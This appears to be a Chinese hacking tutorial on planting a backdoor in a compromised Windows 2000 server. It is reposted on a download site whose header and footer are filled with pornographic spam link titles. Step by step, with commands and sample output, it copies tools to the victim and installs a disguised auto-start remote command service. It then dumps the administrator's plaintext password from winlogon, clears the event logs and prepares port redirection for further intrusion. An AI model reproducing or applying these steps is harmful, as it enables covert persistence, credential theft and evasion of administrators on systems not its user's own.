亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? win2k入侵后后門的放置.txt

?? 常用入侵命令和文章收藏包 介紹了一些常用的 黑客攻擊手段
?? TXT
字號:
轉(zhuǎn)]Win2k入侵后后門的放置 
    在閱讀本文之前,假設(shè)你已經(jīng)成功入侵了某臺Win2k主機并取得了管理員帳號。大多數(shù)時候我們?nèi)肭帜撑_主機的目的并不是為了直接破壞,可以在該主機上留下后門以便自己以后可以方便的“使用”該機。
    目前一般情況下,入侵Win2k后使用最多的后門是RemoteNc了,但該工具有一很大的缺點,容易被殺毒軟件查出,而且如果用fport或Active Ports等軟件也可以看到它監(jiān)聽的端口,這很容易讓管理員發(fā)現(xiàn)。
對于Win2k下的后門推薦使用Win2k Resoruce Kit中自帶的一個小工具
rcmdsvc.exe和rcmd.exe,這是微軟自己出的一個用來在命令行下遠程
管理主機的小工具。它有以下優(yōu)點:

1、不會被殺毒軟件認為是病毒或后門程序,畢竟這是微軟自己出的東西。
2、非常隱蔽,它開的端口是445,和Win2k系統(tǒng)的Microsoft-DS服務(wù)開的
端口一樣,用fport或Active Ports都不能列出它正在監(jiān)聽的端口。

下面我們來看一次實際的操作

當然進行以下操作之前假設(shè)已經(jīng)具有以下條件:

1、你已經(jīng)取得了xxx.xxx.xxx.xxx的管理員權(quán)限
2、該機啟用了tcp/ip上的Netbios支持
3、在IP安全策略中對139和445端口未進行屏蔽
4、安全策略中對匿名連接的額外限制采用的是默認的安全選項

/*如果后三條中有某條不能滿足,那么會讓我們的后續(xù)操作有些困難,
不過仍然有其它辦法可以繼續(xù),如果大家感興趣我會在以后的文章中說明*/

c:\>net use z: \\xxx.xxx.xxx.xxx "password" /user:"administrator"

c:\>copy rcmdsvc.exe z:\winnt\system32
c:\>copy pulist.exe z:\winnt\system32
c:\>copy findpass.exe z:\winnt\system32
c:\>copy kill.exe z:\winnt\system32
c:\>copy clearel.exe z:\winnt\system32
c:\>copy clealog.cmd z:\winnt\system32
c:\>copy fpipe.exe z:\winnt\system32
c:\>copy msvcp60.dll z:\winnt\system32

/*拷貝一些常用的工具到對方服務(wù)器上,在這里對這些工具做一個簡要說明:
rcmdsvc.exe Win2k Resource Kit中的遠程命令行服務(wù)器端程序
pulist.exe 可以列出系統(tǒng)進程和該進程所屬用戶的工具
findpass.exe 可以在winlogon.exe進程中查找指定用戶名的名文口令的工具
kill.exe 可以用pdi或進程名殺掉指定進程的工具
clearel.exe 清除系統(tǒng)、應(yīng)用程序、安全日志的工具
clealog.cmd 同上
fpipe.exe 可以在命令行下做端口重定向的工具
msvcp60.dll vc的運行庫,這個東西其實不是必須的,但為了防止在某些缺少
msvcp60.dll的機上在運行clealog清除日志時對方的機上會突然彈出一個對話
框說缺少msvcp60.dll的尷尬
情況,最好把它一起復(fù)制過去。*/

c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath= 
c:\winnt\system32\rcmdsvc.exe type= own start= auto

/*在這里我們用sc在目標機xxx.xxx.xxx.xxx上創(chuàng)建了一個名為Remote Command 
Service的服務(wù),啟動方式為自動。當然為了隱蔽,你最好把“Remote Command 
Service”這個服務(wù)名改成其它比較類似系統(tǒng)服務(wù)的名字,畢竟管理員不可能
看著一個突然多出來的Remote Command而坐視不管,而且也顯的你太囂張了。*/

/*ps:sc.exe是Win2k Resource Kit中一個功能非常強大的對服務(wù)進行控制的工具,
詳細的使用方法可以參考本站的《sc使用完全指南》。*/

c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"

SERVICE_NAME: rpc support services
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE,NOT_PAUSABLE,
IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0

/*在這里我們用sc啟動剛才創(chuàng)建的Remote Command Service服務(wù)。*/ 

/*下面連上對方服務(wù)器*/

c:\>rcmd

Enter Server Name : xxx.xxx.xxx.xxx
Connect to \\xxx.xxx.xxx.xxx

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\document. and Settings\Default User.WINNT>pulist

Process           PID  User
Idle              0
System            8
smss.exe          168  NT AUTHORITY\SYSTEM
csrss.exe         192  NT AUTHORITY\SYSTEM
winlogon.exe      212  NT AUTHORITY\SYSTEM
services.exe      240  NT AUTHORITY\SYSTEM
lsass.exe         252  NT AUTHORITY\SYSTEM
svchost.exe       408  NT AUTHORITY\SYSTEM
spoolsv.exe       436  NT AUTHORITY\SYSTEM
msdtc.exe         464  NT AUTHORITY\SYSTEM
svchost.exe       596  NT AUTHORITY\SYSTEM
llssrv.exe        624  NT AUTHORITY\SYSTEM
regsvc.exe        676  NT AUTHORITY\SYSTEM
rpcsvc.exe        692  NT AUTHORITY\SYSTEM
mstask.exe        716  NT AUTHORITY\SYSTEM
LSESS.EXE         792  NT AUTHORITY\SYSTEM
tlntsvr.exe       832  NT AUTHORITY\SYSTEM
VrUpSvr.exe       956  NT AUTHORITY\SYSTEM
winmgmt.exe       968  NT AUTHORITY\SYSTEM
dns.exe           980  NT AUTHORITY\SYSTEM
dfssvc.exe        1064 NT AUTHORITY\SYSTEM
POP3S.exe         1100 NT AUTHORITY\SYSTEM
smtpds.exe        1120 NT AUTHORITY\SYSTEM
svchost.exe       1384 NT AUTHORITY\SYSTEM
dllhost.exe       1316 NT AUTHORITY\SYSTEM
internat.exe      1308 SERVER\Administrator
conime.exe        1680 SERVER\Administrator
VRMONSVC.EXE      872  NT AUTHORITY\SYSTEM
inetinfo.exe      1456 NT AUTHORITY\SYSTEM
explorer.exe      1548 SERVER\Administrator
cmd.exe           1712 SERVER\Guest
pulist.exe        532  SERVER\Guest

/*我們可以看到winlogon.exe的進程號是212*/

C:\document. and Settings\Default User.WINNT>findpass server 
administrator 212

To Find Password in the Winlogon process
Usage: fidp DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.
The WinLogon process id is 214 (0x000000d6).
To find server\administrator password in process 214 ...
The encoded password is found at 0x01a00800 and has a length of 3.
The logon information is: server/administrator/Tgrh87fd.
The hash byte is: 0xb8.

/*在winlogon中查找administrator的名文口令*/

C:\document. and Settings\Default User.WINNT>clealog
clealog done

/*清除日志記錄*/

C:\document. and Settings\Default User.WINNT>

到這里我們已經(jīng)看到administrator的密碼是Tgrh87fd

至此我們拿到了管理員的密碼并安放了一個rcmdsvc的后門,當然你還可以接著做許多事。比如利用Adam發(fā)現(xiàn)的Bug再克隆一個管理員賬號。或者用sc把對方的Tlntsvr服務(wù)啟起來。不過后者比較容易被發(fā)現(xiàn),不推薦。如果你對他的內(nèi)網(wǎng)的某臺機感興趣而且該機也有漏洞,可以用fpipe做端口重定向后為下一步的進攻做準備。
 

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧洲精品视频在线观看| 亚洲人成网站影音先锋播放| 国产91对白在线观看九色| 国产精品国产a| 欧美精品三级在线观看| 成人网在线播放| 日本在线播放一区二区三区| 国产精品免费人成网站| 日韩免费视频线观看| 欧美视频在线观看一区| 成人av片在线观看| 精品一区二区三区久久久| 亚洲成人免费看| 亚洲色图欧美激情| 国产精品网曝门| 久久九九久久九九| 日韩欧美成人一区| 欧美区在线观看| 在线视频你懂得一区二区三区| 国产成人亚洲综合a∨婷婷| 毛片av一区二区三区| 亚洲永久免费av| 日韩久久一区二区| 中文字幕的久久| 国产夜色精品一区二区av| 日韩精品一区二区三区视频播放 | 99在线精品免费| 国产一区二区在线看| 裸体健美xxxx欧美裸体表演| 亚洲一区二区三区四区的 | 欧美a级一区二区| 亚洲地区一二三色| 亚洲第一精品在线| 亚洲图片自拍偷拍| 一区二区三区四区蜜桃| 亚洲免费在线播放| 亚洲另类在线视频| 亚洲精品成人天堂一二三| 综合欧美一区二区三区| 国产精品久久久久精k8| 国产精品女主播在线观看| 中文字幕成人在线观看| 国产精品沙发午睡系列990531| 久久久www成人免费无遮挡大片| 精品国产一区二区三区久久久蜜月| 在线综合视频播放| 日韩欧美中文字幕制服| 精品国产乱码久久久久久免费| 日韩一区二区在线看| 日韩精品一区二区三区老鸭窝| 欧美一级免费大片| 精品少妇一区二区三区免费观看| 日韩欧美一区二区免费| 精品国产一区二区三区忘忧草| 26uuu另类欧美| 欧美韩日一区二区三区四区| 亚洲欧洲精品一区二区三区不卡| 亚洲男人都懂的| 午夜视频久久久久久| 日韩—二三区免费观看av| www..com久久爱| 成人精品免费网站| 色系网站成人免费| 欧美精品日韩精品| 久久综合狠狠综合久久综合88 | 亚洲蜜桃精久久久久久久| 亚洲一级二级三级在线免费观看| 香蕉久久夜色精品国产使用方法 | 黄色小说综合网站| 粉嫩高潮美女一区二区三区| 色综合久久88色综合天天6| 欧美日韩精品一区二区| 日韩女优制服丝袜电影| 日本一区二区成人| 亚洲国产另类av| 久久精品国产免费| 91丨九色丨黑人外教| 91.com在线观看| 国产精品免费看片| 免费成人在线播放| 成人爱爱电影网址| 91精品国产综合久久久久久久| 久久蜜桃一区二区| 亚洲一区二区四区蜜桃| 国产一区二区三区不卡在线观看| av一区二区三区在线| 7777精品伊人久久久大香线蕉最新版| xnxx国产精品| 亚洲一卡二卡三卡四卡无卡久久| 久色婷婷小香蕉久久| 91网站最新地址| 日韩欧美一级二级三级久久久| 久久夜色精品国产欧美乱极品| 中文字幕欧美日本乱码一线二线| 亚洲成人激情av| 国内精品久久久久影院一蜜桃| 成人网在线免费视频| 欧美精品视频www在线观看| 国产亚洲一区二区在线观看| 一区二区三区精品视频在线| 日韩国产一区二| 粉嫩绯色av一区二区在线观看| 欧洲精品一区二区三区在线观看| 久久一区二区三区四区| 午夜视频在线观看一区二区| 蜜臂av日日欢夜夜爽一区| 91美女视频网站| 欧美成人官网二区| 亚洲综合一二区| 成人黄色国产精品网站大全在线免费观看| 在线区一区二视频| 久久综合中文字幕| 日韩黄色免费网站| 92国产精品观看| 26uuu成人网一区二区三区| 亚洲一区二区精品视频| www.欧美.com| 日韩欧美一区在线观看| 亚洲一区二区三区四区在线| 久久99精品视频| 欧美综合一区二区三区| 欧美精品一区二区三区蜜桃视频| 亚欧色一区w666天堂| 99视频精品全部免费在线| 欧美xxxxx牲另类人与| 亚洲国产精品欧美一二99| 成人免费毛片片v| 日韩写真欧美这视频| 婷婷成人激情在线网| 91一区二区在线观看| 国产午夜精品久久久久久免费视| 秋霞影院一区二区| 欧美日韩高清一区二区| 五月激情综合色| 在线精品视频一区二区三四| 国产精品久久久久9999吃药| 国产一区日韩二区欧美三区| 日韩限制级电影在线观看| 亚洲综合精品自拍| 欧美色爱综合网| 一区二区三区电影在线播| 97精品久久久久中文字幕| 日本一区二区免费在线观看视频| 九色|91porny| 日韩欧美一卡二卡| 久久精品二区亚洲w码| 欧美一激情一区二区三区| 免费成人av资源网| 欧美一区二区三区在线视频| 亚洲18女电影在线观看| 欧美日韩高清一区二区不卡| 天天操天天干天天综合网| 欧美性大战久久久久久久| 一区二区三区四区中文字幕| 一本大道久久a久久精二百| 亚洲天堂网中文字| 91美女片黄在线| 亚洲国产精品久久久久婷婷884 | 国产一区在线观看视频| 337p粉嫩大胆噜噜噜噜噜91av| 六月丁香综合在线视频| 久久综合狠狠综合久久激情| 国产在线精品一区二区夜色 | 国产一区二三区| 国产亚洲精品免费| 国产麻豆日韩欧美久久| 亚洲视频一二三区| 在线观看视频一区二区欧美日韩| 亚洲美女免费在线| 在线视频一区二区免费| 亚洲综合激情网| 欧美午夜理伦三级在线观看| 亚洲在线视频网站| 91精品免费观看| 久久99九九99精品| 91免费视频网| 午夜日韩在线观看| 久久综合九色综合97婷婷女人 | 午夜视频一区在线观看| 欧美第一区第二区| 国产成人精品免费| 亚洲你懂的在线视频| 欧美区在线观看| 国精产品一区一区三区mba视频| 精品久久人人做人人爰| 成人app网站| 一区二区三区成人| 91在线视频在线| 日韩av中文字幕一区二区| 久久美女艺术照精彩视频福利播放| 99精品视频中文字幕| 亚洲va天堂va国产va久| 制服丝袜在线91| 大胆欧美人体老妇| 图片区日韩欧美亚洲| 久久久精品中文字幕麻豆发布| 一本一本大道香蕉久在线精品| 国产一区中文字幕| 亚洲国产精品影院| 欧美激情一区二区三区蜜桃视频|